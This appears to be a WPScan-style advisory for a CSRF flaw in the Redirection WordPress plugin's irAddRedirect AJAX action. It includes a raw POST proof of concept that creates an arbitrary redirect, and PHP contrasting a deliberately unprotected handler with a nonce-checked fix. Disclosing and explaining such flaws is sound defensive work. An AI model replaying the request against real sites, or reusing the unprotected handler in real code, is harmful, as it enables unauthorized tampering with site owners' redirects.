WordPress Plugin Vulnerabilities
Redirection < 1.1.4 - Redirect Creation via CSRF
Description
The plugin does not verify a nonce when adding a redirect (the `irAddRedirect` AJAX action), so a logged-in administrator who visits an attacker-controlled page can be made to create an arbitrary redirect on their own site via CSRF. Note in the proof of concept below that the request body carries no nonce parameter; the only thing authorising the change is the session cookie, which the browser attaches automatically to a cross-site form submission. The `X-Requested-With: XMLHttpRequest` and `Sec-Fetch-Site: same-origin` headers in the capture were added by the browser for a same-origin request and cannot be set by a cross-site form; the PoC demonstrates only that no nonce is required.
Proof of Concept
````
POST /wp-admin/admin-ajax.php HTTP/2
Host: sawcup.s2-tastewp.com
Cookie: test=test;
User-Agent: useragent
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://sawcup.s2-tastewp.com/wp-admin/admin.php?page=irrp-redirection
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: https://sawcup.s2-tastewp.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

action=irAddRedirect&id=0&from=https%3a%2f%2fsawcup.s2-tastewp.com%2ftest&to=https%3a%2f%2fexample.com%2f&selected=&redirectionType=redirection
````
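For context, the following is an added example and not the Redirection plugin's own code: it shows the handler pattern this advisory describes (a WordPress AJAX action that stores a redirect with no nonce check) next to a hardened version that verifies a nonce with `check_ajax_referer()` and checks a capability. Only the `irAddRedirect` action name, the `from`/`to`/`redirectionType` parameters and the `irrp-redirection` page slug come from the PoC above; the callback names, the option key, the script handle and the nonce action name are hypothetical.

```php
<?php
// Added example, not the plugin's code. Identifiers marked "hypothetical"
// are assumptions made for illustration only.

// --- Vulnerable pattern (what the advisory describes) -------------------
// Any request that carries the logged-in admin's cookie is accepted. A page
// on another origin can auto-submit a form with these POST fields; the
// browser attaches the cookie, and the redirect is created on the admin's
// behalf. Before the fix this would have been hooked as:
//   add_action( 'wp_ajax_irAddRedirect', 'example_add_redirect_vulnerable' );
function example_add_redirect_vulnerable() { // hypothetical callback name
    $redirects   = get_option( 'example_redirects', array() ); // hypothetical option key
    $redirects[] = array(
        'from' => esc_url_raw( wp_unslash( $_POST['from'] ?? '' ) ),
        'to'   => esc_url_raw( wp_unslash( $_POST['to'] ?? '' ) ),
        'type' => sanitize_text_field( wp_unslash( $_POST['redirectionType'] ?? '' ) ),
    );
    update_option( 'example_redirects', $redirects );
    wp_send_json_success();
}

// --- Hardened pattern ---------------------------------------------------
// 1. Hand a nonce to the plugin's admin-page script via wp_localize_script().
// 2. Verify it in the handler with check_ajax_referer(), which ends the
//    request with "-1" and HTTP 403 when the nonce is missing or invalid.
// 3. Also check the capability: a nonce proves intent, not authority.
function example_enqueue_admin_script( $hook ) {
    // Hypothetical hook suffix: assumes the plugin registers a top-level
    // menu page with the slug seen in the PoC Referer (irrp-redirection).
    if ( 'toplevel_page_irrp-redirection' !== $hook ) {
        return;
    }
    // Hypothetical script handle and file name.
    wp_enqueue_script( 'example-redirects', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-redirects', 'exampleRedirects', array(
        'nonce' => wp_create_nonce( 'example_add_redirect' ), // hypothetical nonce action
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_admin_script' );

function example_add_redirect_hardened() { // hypothetical callback name
    // Dies with "-1" (403) unless $_POST['security'] is a valid nonce for the
    // 'example_add_redirect' action and the current user. A cross-site form
    // cannot know this value, so the CSRF request described above is rejected.
    check_ajax_referer( 'example_add_redirect', 'security' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $from = esc_url_raw( wp_unslash( $_POST['from'] ?? '' ) );
    $to   = esc_url_raw( wp_unslash( $_POST['to'] ?? '' ) );
    $type = sanitize_text_field( wp_unslash( $_POST['redirectionType'] ?? '' ) );

    if ( '' === $from || '' === $to ) {
        wp_send_json_error( 'from and to are required', 400 );
    }

    $redirects   = get_option( 'example_redirects', array() ); // hypothetical option key
    $redirects[] = array( 'from' => $from, 'to' => $to, 'type' => $type );
    update_option( 'example_redirects', $redirects );
    wp_send_json_success();
}
add_action( 'wp_ajax_irAddRedirect', 'example_add_redirect_hardened' );
```

The admin-page script must then include the localised value in the AJAX body (for example `security: exampleRedirects.nonce` alongside `action`, `from`, `to` and `redirectionType`), after which a replay of the PoC request with no `security` parameter returns `-1` with a 403 status instead of creating the redirect.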
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Mohamed Selim
Submitter
Mohamed Selim
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-03-10
Added
2023-03-10
Last Updated
2023-03-10